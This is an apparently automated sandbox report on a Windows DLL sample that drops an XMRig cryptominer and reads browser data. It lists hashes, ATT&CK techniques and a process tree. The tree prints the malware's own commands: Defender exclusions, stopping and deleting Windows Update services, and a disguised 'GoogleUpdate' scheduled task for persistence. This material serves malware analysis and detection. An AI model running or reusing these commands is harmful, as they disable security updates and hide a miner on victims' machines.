xmrig | a93ca655369139ae62ade78986971e87d9466400a31c5e4afc0376d960c7d7dd

Analysis

max time kernel
150s
max time network
140s
platform
windows7_x64
resource
win7-20220901-en
submitted
11-09-2022 06:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3e4e0407d84ab7439ae29b79d70aac54.dll
Size

2.7MB
MD5

3e4e0407d84ab7439ae29b79d70aac54
SHA1

dffe8b6a7be96da2212f5fe0c043a3e29db37ef9
SHA256

a93ca655369139ae62ade78986971e87d9466400a31c5e4afc0376d960c7d7dd
SHA512

bc848a7be05991d627a356dd402b6a77f4188dbd6f2d1d1babb926f0a0b2cb9bbf9b2ce60763450c7fc51114338bdd642a24e8fadddfa554694ee9252833b5b5
SSDEEP

49152:Jzl1rpbUrqvv0v2rQVt8nqwI7lOOYcx2ek:P1Kqvv07noI7lOOYcD

Score

10^/10

xmrig evasion miner spyware stealer upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/844-141-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/844-146-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	2036	rundll32.exe
3	2036	rundll32.exe
4	2036	rundll32.exe
9	2036	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1356	xciwsvtmrncvuuabxlwte.exe
1924	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/844-141-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/844-146-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 2 IoCs

pid	Process
2036	rundll32.exe
1696	taskeng.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1924 set thread context of 536	1924	updater.exe	68
PID 1924 set thread context of 844	1924	updater.exe	74

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
456	sc.exe
1180	sc.exe
1912	sc.exe
1440	sc.exe
1936	sc.exe
1580	sc.exe
1784	sc.exe
1240	sc.exe
964	sc.exe
1864	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1940	schtasks.exe
1504	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2036	rundll32.exe
1464	powershell.exe
1976	powershell.exe
2016	powershell.exe
604	powershell.exe
1580	powershell.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe
844	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
472	Process not Found

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	604	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	1924	updater.exe
Token: SeIncreaseQuotaPrivilege	1140	WMIC.exe
Token: SeSecurityPrivilege	1140	WMIC.exe
Token: SeTakeOwnershipPrivilege	1140	WMIC.exe
Token: SeLoadDriverPrivilege	1140	WMIC.exe
Token: SeSystemProfilePrivilege	1140	WMIC.exe
Token: SeSystemtimePrivilege	1140	WMIC.exe
Token: SeProfSingleProcessPrivilege	1140	WMIC.exe
Token: SeIncBasePriorityPrivilege	1140	WMIC.exe
Token: SeCreatePagefilePrivilege	1140	WMIC.exe
Token: SeBackupPrivilege	1140	WMIC.exe
Token: SeRestorePrivilege	1140	WMIC.exe
Token: SeShutdownPrivilege	1140	WMIC.exe
Token: SeDebugPrivilege	1140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1140	WMIC.exe
Token: SeRemoteShutdownPrivilege	1140	WMIC.exe
Token: SeUndockPrivilege	1140	WMIC.exe
Token: SeManageVolumePrivilege	1140	WMIC.exe
Token: 33	1140	WMIC.exe
Token: 34	1140	WMIC.exe
Token: 35	1140	WMIC.exe
Token: SeDebugPrivilege	1924	updater.exe
Token: SeIncreaseQuotaPrivilege	1140	WMIC.exe
Token: SeSecurityPrivilege	1140	WMIC.exe
Token: SeTakeOwnershipPrivilege	1140	WMIC.exe
Token: SeLoadDriverPrivilege	1140	WMIC.exe
Token: SeSystemProfilePrivilege	1140	WMIC.exe
Token: SeSystemtimePrivilege	1140	WMIC.exe
Token: SeProfSingleProcessPrivilege	1140	WMIC.exe
Token: SeIncBasePriorityPrivilege	1140	WMIC.exe
Token: SeCreatePagefilePrivilege	1140	WMIC.exe
Token: SeBackupPrivilege	1140	WMIC.exe
Token: SeRestorePrivilege	1140	WMIC.exe
Token: SeShutdownPrivilege	1140	WMIC.exe
Token: SeDebugPrivilege	1140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1140	WMIC.exe
Token: SeRemoteShutdownPrivilege	1140	WMIC.exe
Token: SeUndockPrivilege	1140	WMIC.exe
Token: SeManageVolumePrivilege	1140	WMIC.exe
Token: 33	1140	WMIC.exe
Token: 34	1140	WMIC.exe
Token: 35	1140	WMIC.exe
Token: SeLockMemoryPrivilege	844	dwm.exe
Token: SeLockMemoryPrivilege	844	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1408 wrote to memory of 2036	1408	rundll32.exe	27
PID 1408 wrote to memory of 2036	1408	rundll32.exe	27
PID 1408 wrote to memory of 2036	1408	rundll32.exe	27
PID 1408 wrote to memory of 2036	1408	rundll32.exe	27
PID 1408 wrote to memory of 2036	1408	rundll32.exe	27
PID 1408 wrote to memory of 2036	1408	rundll32.exe	27
PID 1408 wrote to memory of 2036	1408	rundll32.exe	27
PID 2036 wrote to memory of 1356	2036	rundll32.exe	28
PID 2036 wrote to memory of 1356	2036	rundll32.exe	28
PID 2036 wrote to memory of 1356	2036	rundll32.exe	28
PID 2036 wrote to memory of 1356	2036	rundll32.exe	28
PID 1356 wrote to memory of 1464	1356	xciwsvtmrncvuuabxlwte.exe	29
PID 1356 wrote to memory of 1464	1356	xciwsvtmrncvuuabxlwte.exe	29
PID 1356 wrote to memory of 1464	1356	xciwsvtmrncvuuabxlwte.exe	29
PID 1356 wrote to memory of 1104	1356	xciwsvtmrncvuuabxlwte.exe	31
PID 1356 wrote to memory of 1104	1356	xciwsvtmrncvuuabxlwte.exe	31
PID 1356 wrote to memory of 1104	1356	xciwsvtmrncvuuabxlwte.exe	31
PID 1356 wrote to memory of 1976	1356	xciwsvtmrncvuuabxlwte.exe	32
PID 1356 wrote to memory of 1976	1356	xciwsvtmrncvuuabxlwte.exe	32
PID 1356 wrote to memory of 1976	1356	xciwsvtmrncvuuabxlwte.exe	32
PID 1104 wrote to memory of 1936	1104	cmd.exe	35
PID 1104 wrote to memory of 1936	1104	cmd.exe	35
PID 1104 wrote to memory of 1936	1104	cmd.exe	35
PID 1104 wrote to memory of 1580	1104	cmd.exe	36
PID 1104 wrote to memory of 1580	1104	cmd.exe	36
PID 1104 wrote to memory of 1580	1104	cmd.exe	36
PID 1104 wrote to memory of 1784	1104	cmd.exe	37
PID 1104 wrote to memory of 1784	1104	cmd.exe	37
PID 1104 wrote to memory of 1784	1104	cmd.exe	37
PID 1104 wrote to memory of 1240	1104	cmd.exe	38
PID 1104 wrote to memory of 1240	1104	cmd.exe	38
PID 1104 wrote to memory of 1240	1104	cmd.exe	38
PID 1104 wrote to memory of 456	1104	cmd.exe	39
PID 1104 wrote to memory of 456	1104	cmd.exe	39
PID 1104 wrote to memory of 456	1104	cmd.exe	39
PID 1104 wrote to memory of 852	1104	cmd.exe	40
PID 1104 wrote to memory of 852	1104	cmd.exe	40
PID 1104 wrote to memory of 852	1104	cmd.exe	40
PID 1104 wrote to memory of 1980	1104	cmd.exe	41
PID 1104 wrote to memory of 1980	1104	cmd.exe	41
PID 1104 wrote to memory of 1980	1104	cmd.exe	41
PID 1104 wrote to memory of 2044	1104	cmd.exe	42
PID 1104 wrote to memory of 2044	1104	cmd.exe	42
PID 1104 wrote to memory of 2044	1104	cmd.exe	42
PID 1104 wrote to memory of 1060	1104	cmd.exe	43
PID 1104 wrote to memory of 1060	1104	cmd.exe	43
PID 1104 wrote to memory of 1060	1104	cmd.exe	43
PID 1104 wrote to memory of 1176	1104	cmd.exe	44
PID 1104 wrote to memory of 1176	1104	cmd.exe	44
PID 1104 wrote to memory of 1176	1104	cmd.exe	44
PID 1976 wrote to memory of 1940	1976	powershell.exe	45
PID 1976 wrote to memory of 1940	1976	powershell.exe	45
PID 1976 wrote to memory of 1940	1976	powershell.exe	45
PID 1356 wrote to memory of 2016	1356	xciwsvtmrncvuuabxlwte.exe	46
PID 1356 wrote to memory of 2016	1356	xciwsvtmrncvuuabxlwte.exe	46
PID 1356 wrote to memory of 2016	1356	xciwsvtmrncvuuabxlwte.exe	46
PID 2016 wrote to memory of 520	2016	powershell.exe	48
PID 2016 wrote to memory of 520	2016	powershell.exe	48
PID 2016 wrote to memory of 520	2016	powershell.exe	48
PID 1696 wrote to memory of 1924	1696	taskeng.exe	50
PID 1696 wrote to memory of 1924	1696	taskeng.exe	50
PID 1696 wrote to memory of 1924	1696	taskeng.exe	50
PID 1924 wrote to memory of 604	1924	updater.exe	51
PID 1924 wrote to memory of 604	1924	updater.exe	51

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\3e4e0407d84ab7439ae29b79d70aac54.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\3e4e0407d84ab7439ae29b79d70aac54.dll,#1
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Users\Admin\AppData\Local\Temp\xciwsvtmrncvuuabxlwte.exe
    "C:\Users\Admin\AppData\Local\Temp\xciwsvtmrncvuuabxlwte.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1464
  - - C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1104
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1936
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1580
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1784
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:1240
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:456
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:852
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:1980
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:2044
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:1060
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1976
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
        5⤵
        Creates scheduled task(s)
        
        PID:1940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2016
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        5⤵
        
        PID:520

C:\Windows\system32\taskeng.exe
taskeng.exe {06EB8060-66B4-4078-8EA7-1C24FA79190F} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:604
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1936
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:964
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1180
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:1912
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:1440
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:1864
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:1408
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:1176
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      PID:1112
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:1732
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:1276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1580
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
      4⤵
      Creates scheduled task(s)
      PID:1504
- - C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe jmcfgycslfymn
    3⤵
    PID:536
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
      4⤵
      PID:1104
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Name
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1140
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
    3⤵
    PID:2008
- - C:\Windows\system32\dwm.exe
    C:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:844

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\xciwsvtmrncvuuabxlwte.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
C:\Users\Admin\AppData\Local\Temp\xciwsvtmrncvuuabxlwte.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log

Filesize
134B

MD5
13704a81e6a12d0657753b6746a4fb24

SHA1
9e1dd1fa6000c991e12a1ab41f3fb04ed37a6cca

SHA256
56556055091ba96cf10e85b2db4c5154e2b647b832a272915f973862c3c531a4

SHA512
e099d6c94c431c4cc9df82f4993a8d91a36b1c351f1a4eb699fc6b67b3a8dd0c386b2346dc1dcb854db004cea2070f38d717caba8a922926ecec968ebe6db66e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e50bede45b2c35d24dac4e11004b597d

SHA1
7e0744d3e8045ef1e5cfa4c1104043879978ab02

SHA256
ed929a52cacc3f6fbeb3ab88d66fc907c287fc6baa500d3873fdc69b70ff98cb

SHA512
af0cd9565234fd79841ed4ac850374792d3c73b726bec5e1ae431923c484823862283a7d55e6045d79de4bbd08617bf892fdda4896ce40933741ff8d22920b40

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e50bede45b2c35d24dac4e11004b597d

SHA1
7e0744d3e8045ef1e5cfa4c1104043879978ab02

SHA256
ed929a52cacc3f6fbeb3ab88d66fc907c287fc6baa500d3873fdc69b70ff98cb

SHA512
af0cd9565234fd79841ed4ac850374792d3c73b726bec5e1ae431923c484823862283a7d55e6045d79de4bbd08617bf892fdda4896ce40933741ff8d22920b40

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e50bede45b2c35d24dac4e11004b597d

SHA1
7e0744d3e8045ef1e5cfa4c1104043879978ab02

SHA256
ed929a52cacc3f6fbeb3ab88d66fc907c287fc6baa500d3873fdc69b70ff98cb

SHA512
af0cd9565234fd79841ed4ac850374792d3c73b726bec5e1ae431923c484823862283a7d55e6045d79de4bbd08617bf892fdda4896ce40933741ff8d22920b40

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e50bede45b2c35d24dac4e11004b597d

SHA1
7e0744d3e8045ef1e5cfa4c1104043879978ab02

SHA256
ed929a52cacc3f6fbeb3ab88d66fc907c287fc6baa500d3873fdc69b70ff98cb

SHA512
af0cd9565234fd79841ed4ac850374792d3c73b726bec5e1ae431923c484823862283a7d55e6045d79de4bbd08617bf892fdda4896ce40933741ff8d22920b40

Download Submit
\Users\Admin\AppData\Local\Temp\xciwsvtmrncvuuabxlwte.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
memory/604-108-0x000007FEF2890000-0x000007FEF33ED000-memory.dmp

Filesize
11.4MB

Download
memory/604-109-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/604-110-0x00000000025E4000-0x00000000025E7000-memory.dmp

Filesize
12KB

Download
memory/604-111-0x00000000025EB000-0x000000000260A000-memory.dmp

Filesize
124KB

Download
memory/604-112-0x00000000025E4000-0x00000000025E7000-memory.dmp

Filesize
12KB

Download
memory/604-107-0x000007FEF33F0000-0x000007FEF3E13000-memory.dmp

Filesize
10.1MB

Download
memory/604-113-0x00000000025EB000-0x000000000260A000-memory.dmp

Filesize
124KB

Download
memory/844-146-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/844-143-0x0000000000000000-0x0000000001000000-memory.dmp

